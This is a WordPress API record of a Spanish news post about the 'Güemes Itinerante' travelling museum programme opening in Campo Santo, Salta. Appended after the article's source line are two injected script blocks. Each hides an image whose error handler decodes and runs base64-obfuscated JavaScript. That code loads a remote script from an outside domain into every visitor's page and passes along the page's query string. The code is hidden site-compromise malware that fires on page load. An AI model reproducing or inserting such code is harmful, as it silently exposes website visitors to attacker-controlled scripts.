{"id":1387,"date":"2022-08-30T12:42:54","date_gmt":"2022-08-30T15:42:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1387"},"modified":"2025-08-14T00:37:07","modified_gmt":"2025-08-14T03:37:07","slug":"guemes-itinerante-ya-esta-en-marcha-primera-parada-campo-santo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1387","title":{"rendered":"\u00abG\u00fcemes Itinerante\u00bb ya est\u00e1 en marcha: primera parada, Campo Santo"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#67051d\"><em>El programa sintetiza las principales tecnolog\u00edas del Museo G\u00fcemes para itinerar por toda la provincia y llegar a quienes no puedan visitarlo. La primera parada es Campo Santo, donde ya est\u00e1n participando alumnos de todos los niveles.<\/em><\/h4>\n\n\n\n<p>Durante la ma\u00f1ana de hoy, el secretario de Cultura&nbsp;<strong>Diego Ashur&nbsp;<\/strong>dej\u00f3 inaugurada la primera muestra del programa \u201cG\u00fcemes Itinerante\u201d en Campo Santo, junto a la intendenta de la localidad, Josefina Pastrana.<\/p>\n\n\n\n<p>En la ocasi\u00f3n, el funcionario expres\u00f3 \u201cestamos muy contentos de estar hoy ac\u00e1, en Campo Santo, dando inicio a esta versi\u00f3n itinerante del Museo G\u00fcemes que permite llegar a cada ciudadano y ciudadana de la provincia que, en muchos casos, no pueden acercarse a Salta Capital para visitarlo\u201d.<\/p>\n\n\n\n<p>Asimismo, destac\u00f3 la importancia de recorrer los municipios reforzando el objetivo con que fue creado el Museo: \u201cdifundir la vida y el aporte del General Mart\u00edn Miguel de G\u00fcemes a la lucha independentista\u201d.<\/p>\n\n\n\n<p>G\u00fcemes Itinerante permanecer\u00e1 en el Complejo Deportivo Roberto Romero de Campo Santo hasta el mediod\u00eda del jueves 1 de septiembre, y ya cuenta con la participaci\u00f3n confirmada de cerca de mil alumnos de todos niveles, pertenecientes a instituciones educativas de la zona.<\/p>\n\n\n\n<p>Habr\u00e1, adem\u00e1s, horarios para visitas del p\u00fablico en general (consultar en cultura municipal).<\/p>\n\n\n\n<p>Participaron de la inauguraci\u00f3n la subsecretaria de Patrimonio Cultural, Claudia Lamas; el director de Cultura de Campo Santo, Eduardo Medina; la directora del Museo G\u00fcemes, Natalia Mart\u00edn; la directora de Explora Salta, Isabel Zacca; y el director del Museo de Arqueolog\u00eda de Cachi, Diego Sberna.<\/p>\n\n\n\n<p><em><strong>Sobre G\u00fcemes Intinerante<\/strong><\/em><\/p>\n\n\n\n<p>Con la idea de traspasar sus paredes, democratizar el acceso a su valioso contenido y contribuir positivamente a la oferta cultural de los municipios, el Museo G\u00fcemes puso en marcha \u201cG\u00fcemes Itinerante\u201d recreando las tecnolog\u00edas presentes en el mismo, junto a Fundaci\u00f3n Capacitar NOA como ente de vinculaci\u00f3n tecnol\u00f3gica.<\/p>\n\n\n\n<p>Todas las personas y la matr\u00edcula escolar de los municipios, tienen la oportunidad de conocer los cuadros de los padres de Mart\u00edn Miguel que son interactivos, el mapping a menor escala, un animatronic a tama\u00f1o real y en breve, se sumar\u00e1 un efecto hologr\u00e1fico para que conozcan el backastage de todos los recursos tecnol\u00f3gicos que ponemos a disposici\u00f3n de la cultura.<\/p>\n\n\n\n<p>Los municipios e instituciones interesadas en recibir \u201cG\u00fcemes Itinerante\u201d, deben ingresar a www.museoguemes.gob.ar y descargar del Men\u00fa el formulario de solicitud. Una vez realizado ese tr\u00e1mite virtual, personal del Museo se pondr\u00e1 en contacto para pautar una agenda.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/guemes-itinerante-ya-esta-en-marcha-primera-parada-campo-santo-84577\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El programa sintetiza las principales tecnolog\u00edas del Museo G\u00fcemes para itinerar por toda la provincia y llegar a quienes no puedan visitarlo. La primera parada es Campo Santo, donde ya est\u00e1n participando alumnos de todos los niveles. Durante la ma\u00f1ana de hoy, el secretario de Cultura&nbsp;Diego Ashur&nbsp;dej\u00f3 inaugurada la primera muestra del programa \u201cG\u00fcemes Itinerante\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1388,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-1387","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1387"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1387"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1387\/revisions"}],"predecessor-version":[{"id":7374,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1387\/revisions\/7374"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1388"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}